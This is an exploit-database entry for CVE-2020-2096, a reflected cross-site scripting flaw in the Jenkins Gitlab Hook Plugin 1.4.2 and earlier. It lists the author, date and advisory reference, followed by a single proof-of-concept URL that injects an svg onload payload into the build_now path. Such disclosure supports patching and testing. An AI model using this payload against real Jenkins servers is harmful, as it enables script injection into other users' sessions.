Jenkins Gitlab Hook Plugin 1.4.2 – Reflected Cross-Site Scripting

  • Author: Ai Ho
  • Date: 2020-01-16
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/47927/
# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage: https://jenkins.io/
# Affected versions: Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E